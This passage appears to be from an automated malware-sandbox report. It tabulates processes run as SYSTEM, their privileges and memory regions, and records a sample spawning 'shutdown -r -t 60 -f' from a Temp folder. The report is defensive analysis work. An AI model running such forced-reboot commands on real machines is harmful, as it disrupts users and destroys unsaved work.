Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 660
0x 9B4
0x 9B0
0x 9A8
0x 994
0x 9BC
0x AAC
0x AB0
0x A94
0x ACC
0x A90
0x A9C
0x AA0
0x AA4
0x 220
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
iexplore.exe.mui 0x000d0000 0x000d1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00100000 0x00100fff Memory Mapped File Readable False False False -
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x00150000 0x0015ffff Memory Mapped File Readable, Writable True False False -
index.dat 0x00160000 0x00167fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00170000 0x0017ffff Memory Mapped File Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable True False False -
private_0x00000000002a0000 0x002a0000 0x0039ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003a0000 0x003a0000 0x00527fff Pagefile Backed Memory Readable True False False -
private_0x0000000000530000 0x00530000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x005cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005d0000 0x005d0000 0x00750fff Pagefile Backed Memory Readable True False False -
private_0x0000000000760000 0x00760000 0x0077ffff Private Memory Readable, Writable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x00880000 0x00b4efff Memory Mapped File Readable False False False -
private_0x0000000000b50000 0x00b50000 0x00c4ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000c50000 0x00c50000 0x00cbdfff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000ce0000 0x00ce0000 0x00d1ffff Private Memory Readable, Writable True False False -
private_0x0000000000d20000 0x00d20000 0x00d5ffff Private Memory Readable, Writable True False False -
private_0x0000000000d70000 0x00d70000 0x00daffff Private Memory Readable, Writable True False False -
private_0x0000000000db0000 0x00db0000 0x00deffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000df0000 0x00df0000 0x00e4cfff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000e50000 0x00e50000 0x00e8ffff Private Memory Readable, Writable True False False -
private_0x0000000000f10000 0x00f10000 0x00f1ffff Private Memory Readable, Writable True False False -
private_0x0000000000f40000 0x00f40000 0x0103ffff Private Memory Readable, Writable True False False -
private_0x0000000001070000 0x01070000 0x010affff Private Memory Readable, Writable True False False -
iexplore.exe 0x010c0000 0x01165fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001170000 0x01170000 0x0256ffff Pagefile Backed Memory Readable True False False -
private_0x00000000025a0000 0x025a0000 0x025dffff Private Memory Readable, Writable True False False -
private_0x0000000002610000 0x02610000 0x0270ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002710000 0x02710000 0x027eefff Pagefile Backed Memory Readable True False False -
private_0x0000000002830000 0x02830000 0x0286ffff Private Memory Readable, Writable True False False -
private_0x0000000002890000 0x02890000 0x028cffff Private Memory Readable, Writable True False False -
private_0x00000000028d0000 0x028d0000 0x029cffff Private Memory Readable, Writable True False False -
private_0x0000000002a00000 0x02a00000 0x02afffff Private Memory Readable, Writable True False False -
private_0x0000000002b30000 0x02b30000 0x02c2ffff Private Memory Readable, Writable True False False -
private_0x0000000002cd0000 0x02cd0000 0x02dcffff Private Memory Readable, Writable True False False -
private_0x0000000002dd0000 0x02dd0000 0x02e0ffff Private Memory Readable, Writable True False False -
private_0x0000000002e30000 0x02e30000 0x02e6ffff Private Memory Readable, Writable True False False -
private_0x0000000002eb0000 0x02eb0000 0x02faffff Private Memory Readable, Writable True False False -
private_0x0000000002fb0000 0x02fb0000 0x030affff Private Memory Readable, Writable True False False -
private_0x00000000030d0000 0x030d0000 0x031cffff Private Memory Readable, Writable True False False -
private_0x00000000031f0000 0x031f0000 0x0322ffff Private Memory Readable, Writable True False False -
private_0x00000000032c0000 0x032c0000 0x032cffff Private Memory Readable, Writable True False False -
private_0x0000000003390000 0x03390000 0x0348ffff Private Memory Readable, Writable True False False -
private_0x00000000035d0000 0x035d0000 0x036cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000036d0000 0x036d0000 0x03ac2fff Pagefile Backed Memory Readable True False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
ieframe.dll 0x73110000 0x73b8ffff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x749f0000 0x74a22fff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x74d40000 0x74d47fff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x74d50000 0x74da9fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x74e90000 0x74ecbfff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74ed0000 0x74ed5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74ee0000 0x74eeffff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x74ef0000 0x74ef5fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74f00000 0x74f51fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74f60000 0x74f6dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74f70000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74fb0000 0x74fc5fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x74fd0000 0x74fdcfff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x74fe0000 0x74ff4fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75000000 0x75008fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x75010000 0x75030fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x750c0000 0x750cafff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x750d0000 0x7526dfff Memory Mapped File Readable, Writable, Executable False False False -
msimg32.dll 0x75270000 0x75274fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x752b0000 0x752c2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75a20000 0x75a24fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76240000 0x76375fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76570000 0x76664fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x767f0000 0x7686afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x77940000 0x77984fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 115 entries are omitted.
The remaining entries can be found in flog.txt.
Process #16: shutdown.exe
0 0
»
Information Value
ID #16
File Name c:\windows\syswow64\shutdown.exe
Command Line shutdown -r -t 60 -f
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:45, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:39
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x978
Parent PID 0x7fc (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 99C
0x 9DC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
private_0x0000000000100000 0x00100000 0x0010ffff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x003b7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000420000 0x00420000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x0000000000690000 0x00690000 0x0078ffff Private Memory Readable, Writable True False False -
shutdown.exe 0x00cd0000 0x00cd9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x75720000 0x75727fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #17: ie4uinit.exe
0 0
»
Information Value
ID #17
File Name c:\windows\syswow64\ie4uinit.exe
Command Line "C:\Windows\SysWOW64\ie4uinit.exe" -ShowQLIcon
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:45, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:39
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x9a4
Parent PID 0x7e8 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 9B8
0x 914
0x A80
0x A7C
0x A74
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00140000 0x00140fff Memory Mapped File Readable False False False -
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory Readable, Writable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x002cefff Pagefile Backed Memory Readable True False False -
private_0x00000000002d0000 0x002d0000 0x0030ffff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x00310000 0x0032efff Memory Mapped File Readable True False False -
pagefile_0x0000000000330000 0x00330000 0x00330fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000360000 0x00360000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True False False -
private_0x0000000000650000 0x00650000 0x0068ffff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x006effff Private Memory Readable, Writable True False False -
private_0x00000000006f0000 0x006f0000 0x0072ffff Private Memory Readable, Writable True False False -
private_0x0000000000750000 0x00750000 0x0078ffff Private Memory Readable, Writable True False False -
private_0x00000000007c0000 0x007c0000 0x007cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000007d0000 0x007d0000 0x00957fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000960000 0x00960000 0x00ae0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000ba0000 0x00ba0000 0x00bdffff Private Memory Readable, Writable True False False -
private_0x0000000000c20000 0x00c20000 0x00c5ffff Private Memory Readable, Writable True False False -
private_0x0000000000c60000 0x00c60000 0x00c9ffff Private Memory Readable, Writable True False False -
ie4uinit.exe 0x00d90000 0x00dbdfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000dc0000 0x00dc0000 0x021bffff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000021c0000 0x021c0000 0x02502fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000002510000 0x02510000 0x02902fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02910000 0x02bdefff Memory Mapped File Readable False False False -
netutils.dll 0x74940000 0x74948fff Memory Mapped File Readable, Writable, Executable False False False -
ntshrui.dll 0x74950000 0x749bffff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x749f0000 0x749f9fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x74a00000 0x74a0afff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x74a10000 0x74a28fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x74e90000 0x74ecbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75000000 0x75008fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x75010000 0x75030fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x750c0000 0x750cafff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x750d0000 0x7526dfff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x75270000 0x75278fff Memory Mapped File Readable, Writable, Executable False False False -
advpack.dll 0x75280000 0x752adfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x75780000 0x75874fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x75c00000 0x75c26fff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75c30000 0x75dccfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x76870000 0x76881fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x77940000 0x77984fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #18: iexplore.exe
0 0
»
Information Value
ID #18
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2024 CREDAT:14337
